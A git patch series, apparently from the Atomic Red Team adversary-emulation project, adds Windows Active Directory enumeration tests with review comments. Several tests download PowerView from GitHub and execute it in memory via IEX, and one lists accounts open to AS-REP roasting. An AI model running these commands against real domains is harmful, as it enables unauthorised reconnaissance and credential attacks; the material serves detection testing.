 atomics/T1069.002/T1069.002.yaml | 47 ++++++++++++++++++++++++++++++++
 atomics/T1087.002/T1087.002.yaml | 12 ++++++++
 atomics/T1558.004/T1558.004.yaml | 10 +++++++
 4 files changed, 81 insertions(+)
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 9dd11702..4f67a880 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -310,3 +310,15 @@ atomic_tests:
 Write-Host $Computer}
 name: powershell
 elevation_required: false
+- name: Enumerate Active Directory Computers with ADSISearcher
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+ Upon successful execution a listing of computers will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
\ No newline at end of file
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 8bc29220..80b9b6a3 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
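Review bot: The new ADSISearcher test declares no `dependencies`, so on a host that is not domain joined `[adsisearcher]...FindAll()` fails inside the executor instead of at a prerequisite check; the Get-ADUser test added to T1069.002 in this same commit carries a `dependency_executor_name: powershell` / `dependencies:` block with a `PartOfDomain` check that fits here unchanged. The same gap is in the ADSISearcher tests added to T1069.002 and T1087.002 in this commit. The index regenerated in a later patch on this page already lists T1018 test #15, "Enumerate domain computers within Active Directory using DirectorySearcher", so the description should say how this test differs from it. All four patched YAML files end with `\ No newline at end of file`.
```yaml
- name: Enumerate Active Directory Computers with ADSISearcher
  # … unchanged: description, supported_platforms …
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must be domain joined.
    prereq_command: |
      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
    get_prereq_command: |
      Write-Host Joining this computer to a domain must be done manually.
  # … unchanged: executor …
```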
@@ -133,3 +133,50 @@ atomic_tests:
 command: |
 #{adfind_path} -f (objectcategory=group)
 name: command_prompt
+- name: Enumerate Active Directory Groups with ADSISearcher
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+ Upon successful execution a listing of groups will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ ([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+- name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+ description: |
+ When successful, accounts that do not require kerberos pre-auth will be returned.
+ Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Computer must be domain joined.
+ prereq_command: |
+ if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Write-Host Joining this computer to a domain must be done manually.
+ - description: |
+ Requires the Active Directory module for powershell to be installed.
+ prereq_command: |
+ if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+- name: Get-DomainGroupMember with PowerView
+ description: |
+ Utilizing PowerView, run Get-DomainGroupMember to identify domain users. 
Upon execution, progress and info about groups within the domain being scanned will be displayed.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 54de57ff..aa1dd16a 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -214,3 +214,15 @@ atomic_tests:
 elevation_required: false
 command: |
 Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+- name: Enumerate Active Directory Users with ADSISearcher
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+ Upon successful execution a listing of users will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
\ No newline at end of file
diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
index e427d061..52139328 100644
--- a/atomics/T1558.004/T1558.004.yaml
+++ b/atomics/T1558.004/T1558.004.yaml
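Review bot: The Get-DomainGroupMember test loads PowerView from the `master` branch URL at run time, while the Get-DomainUser test added to T1558.004 in this same commit pins the script to commit f94a5d298a1b4c5dfb1f30a246d9c73d13b22888; pinning here as well, `IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"`, keeps the executed content fixed and the test reproducible. Its description says the test identifies domain users, but the command lists the members of one group; `Utilizing PowerView, run Get-DomainGroupMember to list the members of the "Domain Admins" group.` matches what runs, and the hard-coded group name is a candidate for an `input_arguments` entry. Neither PowerView test declares a dependency on domain membership or on reaching raw.githubusercontent.com, unlike the Get-ADUser test in this hunk, so failures surface inside `IEX` rather than at a prerequisite check. The index regenerated in a later patch on this page already lists a T1069.002 test #7, "Enumerate Users Not Requiring Pre Auth (ASRepRoast)", so the new Get-ADUser test may overlap with it and, as an account rather than a group enumeration, arguably belongs under T1087.002 or T1558.004.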
@@ -46,3 +46,13 @@ atomic_tests:
 Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
 name: powershell
 elevation_required: false
+- name: Get-DomainUser with PowerView
+ description: |
+ Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+ name: powershell
\ No newline at end of file
From b52281c4cda425d3e89150b397abb609c7362077 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 16:43:54 +0000 Subject: [PATCH 26/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/T1018/T1018.yaml | 1 +
 atomics/T1069.002/T1069.002.yaml | 3 +++
 atomics/T1087.002/T1087.002.yaml | 1 +
 atomics/T1558.004/T1558.004.yaml | 1 +
 atomics/used_guids.txt | 6 ++++++
 5 files changed, 12 insertions(+)
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 4f67a880..1f1212bb 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -311,6 +311,7 @@ atomic_tests:
 name: powershell
 elevation_required: false
 - name: Enumerate Active Directory Computers with ADSISearcher
+ auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
 description: |
 The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
 Upon successful execution a listing of computers will output with their paths in AD.
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 80b9b6a3..daebe0b7 100644
--- a/atomics/T1069.002/T1069.002.yaml
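Review bot: The description says the test identifies domain users, but the command passes `-PreauthNotRequired`, so only accounts with Kerberos pre-authentication disabled are returned; `Utilizing PowerView, run Get-DomainUser -PreauthNotRequired to list domain users that do not require Kerberos pre-authentication. Upon execution, the distinguished names of matching users will be displayed.` describes what actually runs. The test fetches and executes PowerView.ps1 at run time but has no `dependencies` block, so a host that is not domain joined or cannot reach raw.githubusercontent.com fails inside `IEX` rather than at a prerequisite check; the `PartOfDomain` prereq used by the Get-ADUser test added to T1069.002 in this commit fits here. The file is left without a trailing newline (`\ No newline at end of file`).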
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -134,6 +134,7 @@ atomic_tests:
 #{adfind_path} -f (objectcategory=group)
 name: command_prompt
 - name: Enumerate Active Directory Groups with ADSISearcher
+ auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
 description: |
 The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
 Upon successful execution a listing of groups will output with their paths in AD.
@@ -146,6 +147,7 @@ atomic_tests:
 command: |
 ([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
 - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+ auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
 description: |
 When successful, accounts that do not require kerberos pre-auth will be returned.
 Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
@@ -171,6 +173,7 @@ atomic_tests:
 command: |
 Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
 - name: Get-DomainGroupMember with PowerView
+ auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
 description: |
 Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
 supported_platforms:
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index aa1dd16a..fd3d98f1 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -215,6 +215,7 @@ atomic_tests:
 command: |
 Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
 - name: Enumerate Active Directory Users with ADSISearcher
+ auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
 description: |
 The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
 Upon successful execution a listing of users will output with their paths in AD.
diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
index 52139328..165f58d1 100644
--- a/atomics/T1558.004/T1558.004.yaml
+++ b/atomics/T1558.004/T1558.004.yaml
@@ -47,6 +47,7 @@ atomic_tests:
 name: powershell
 elevation_required: false
 - name: Get-DomainUser with PowerView
+ auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
 description: |
 Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
 supported_platforms:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7a3a3bc4..80e8ed2f 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -884,3 +884,9 @@ e895677d-4f06-49ab-91b6-ae3742d0a2ba
 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
 0b79c06f-c788-44a2-8630-d69051f1123d
 a27418de-bdce-4ebd-b655-38f04842bf0c
+64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+9f4e344b-8434-41b3-85b1-d38f29d148d0
+43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+46352f40-f283-4fe5-b56d-d9a71750e145
+02e8be5a-3065-4e54-8cc8-a14d138834d3
+d6139549-7b72-4e48-9ea1-324fc9bdf88a
From 4c019a8936126d8e36acc4c2af4b6ffc777a2f39 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 16:44:03 +0000 Subject: [PATCH 27/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/Indexes-CSV/index.csv | 6 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 6 +
 atomics/Indexes/Indexes-Markdown/index.md | 6 +
 .../Indexes/Indexes-Markdown/windows-index.md | 6 +
 atomics/Indexes/index.yaml | 103 ++++++++++++++++
 atomics/T1018/T1018.md | 32 +++++
 atomics/T1069.002/T1069.002.md | 115 ++++++++++++++++++
 atomics/T1087.002/T1087.002.md | 32 +++++
 atomics/T1558.004/T1558.004.md | 31 +++++
 9 files changed, 337 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 0a6f7538..4e598d60 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
 credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
@@ -781,6 +782,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -789,6 +791,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -857,6 +862,7 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 25300732..2a0ede05 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -524,6 +525,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -532,6 +534,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt +discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell +discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell +discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell 
@@ -573,6 +578,7 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell +discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 253ca895..0c8c1184 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -8,6 +8,7 @@ - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md) - Atomic Test #1: Rubeus asreproast [windows] + - Atomic Test #2: Get-DomainUser with PowerView [windows] - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1282,6 +1283,7 @@ - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] + - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] @@ -1291,6 +1293,9 @@ - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - Atomic Test #8: Adfind - Query Active Directory Groups [windows] + - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows] + - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows] + - Atomic Test #11: Get-DomainGroupMember with PowerView [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] @@ -1374,6 +1379,7 @@ - Atomic Test #13: Remote System Discovery - ip route [linux] - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux] - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows] + - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows] - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #1: Security Software Discovery [windows] - Atomic Test #2: Security Software Discovery - powershell [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5a6fc548..9aca2c0d 100644 
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -3,6 +3,7 @@ - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md) - Atomic Test #1: Rubeus asreproast [windows] + - Atomic Test #2: Get-DomainUser with PowerView [windows] - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) @@ -906,6 +907,7 @@ - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] + - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] @@ -915,6 +917,9 @@ - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - Atomic Test #8: Adfind - Query Active Directory Groups [windows] + - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows] + - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows] + - Atomic Test #11: Get-DomainGroupMember with PowerView [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] 
@@ -971,6 +976,7 @@ - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows] - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows] - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows] + - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows] - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #1: Security Software Discovery [windows] - Atomic Test #2: Security Software Discovery - powershell [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 66dce2ee..32ccfe39 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -341,6 +341,20 @@ credential-access: ' name: powershell elevation_required: false + - name: Get-DomainUser with PowerView + auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a + description: 'Utilizing PowerView, run Get-DomainUser to identify domain users. + Upon execution, progress and info about users within the domain being scanned + will be displayed. + +' + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose + name: powershell T1552.003: technique: external_references: 
@@ -55087,6 +55101,18 @@ discovery: -Server #{domain} ' + - name: Enumerate Active Directory Users with ADSISearcher + auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3 + description: | + The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. + Upon successful execution a listing of users will output with their paths in AD. + Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne() T1069.002: technique: external_references: 
